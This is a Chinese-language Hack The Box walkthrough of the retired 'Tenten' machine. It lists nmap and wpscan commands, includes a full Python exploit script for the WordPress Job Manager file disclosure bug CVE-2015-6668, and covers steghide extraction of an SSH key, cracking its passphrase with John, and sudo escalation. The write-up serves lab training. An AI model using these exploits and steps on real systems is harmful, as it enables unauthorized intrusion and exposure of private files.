HTB-靶机-Tenten

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.10

nmap -sC -sV -p- -T5 10.10.10.10 -oN tenten.nmap

nmap扫描结果

就开了两个端口，看下Web应用，发现是个wordpress 点击了几个页面，发现下面这个

点下那个Apply Now 到了如下页面

得到上面的url地址：http://10.10.10.10/index.php/jobs/apply/8/ 其中最末尾是个数字，可以先探测下，这里可以使用burpsuite，wfuzz进行探测，我为了方便显示就使用shell脚本循环进行探测显示

for i in $(seq 1 25); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1; done

发现了一个标题信息为HackerAccessGranted，这是个重要的提示信息，先放着，我们使用wpscan扫描下目标并枚举下存在哪些用户，在使用之前需要先在https://wpscan.com/ 注册下免费的账户，然后使用官方免费的api来获取漏洞信息，不然wpscan扫描不了任何漏洞信息，我这里已经注册好了，下面是扫描结果

wpscan --url http://10.10.10.10 -e ap,t,tt,u --api-token pFokhQNG8ZFEmmntdfHfTYnrYdnvJHKtVtDuHTqTqBc

发现一个插件漏洞可以探测出敏感信息，编号是CVE-2015-6668这里可以使用下面的exploit

https://raw.githubusercontent.com/Johk3/HTB_Walkthrough/master/Tenten/disclosurevuln.py

https://raw.githubusercontent.com/Jack-Barradell/exploits/master/CVE-2015-6668/cve-2015-6668.py   这个没测试成功

import requests

print """
CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Author: Evangelos Mourikis
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25
"""
website = raw_input('Enter a vulnerable website: ')
filename = raw_input('Enter a file name: ')

filename2 = filename.replace(" ", "-")

for year in range(2016,2018):
    for i in range(1,13):
        for extension in {'jpeg','txt','doc','pdf','docx'}:
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code==200:
                print "[+] URL of CV found! " + URL

上面测试的结果：

根据上面信息最终得出了图片文件地址：http://10.10.10.10//wp-content/uploads/2017/04/HackerAccessGranted.jpg

同时上面wpscan扫描发现一个目标wordpress用户名，后面应该会用到，先放着

访问http://10.10.10.10//wp-content/uploads/2017/04/HackerAccessGranted.jpg 并下载下来

使用wget下载下来使用strings命令没查到有价值的信息，然后捣鼓了半天确认该图片使用了隐写术存放了隐藏文件，需要使用此命令 steghide 相关用法参考：https://blog.csdn.net/abc_12366/article/details/87098397

steghide extract -sf HackerAccessGranted.jpg

使用上面命令执行之后需要输入密码，尝试直接敲击回车使用空密码 登录上去了

此时生成了文件id_rsa 查看一下该文件

直接使用该文件进行ssh登录，用户就是上面wpscan扫描到的用户

需要输入密钥的密码，没法了，使用john进行暴力破解了，破解之前先使用ssh2john转换为john能识别的形式

python /usr/share/john/ssh2john.py id_rsa > bmfxcrack.txt

破解出来密钥的密码是superpassword ，那么再次远程ssh登录目标靶机

成功登录，执行了下sudo -l 可以提权的文件是fuckin  ，看下该文件是什么类型的，发现就是bash脚本，然后看下里面的内容，加了shell的位置变量，这就好办了，直接提权